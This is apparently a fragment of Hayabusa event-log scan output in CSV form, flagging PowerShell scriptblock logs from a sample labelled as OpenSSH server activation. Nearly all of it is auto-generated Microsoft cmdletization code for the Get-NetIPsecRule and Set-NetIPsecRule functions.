[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'En",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'En",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,abled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { 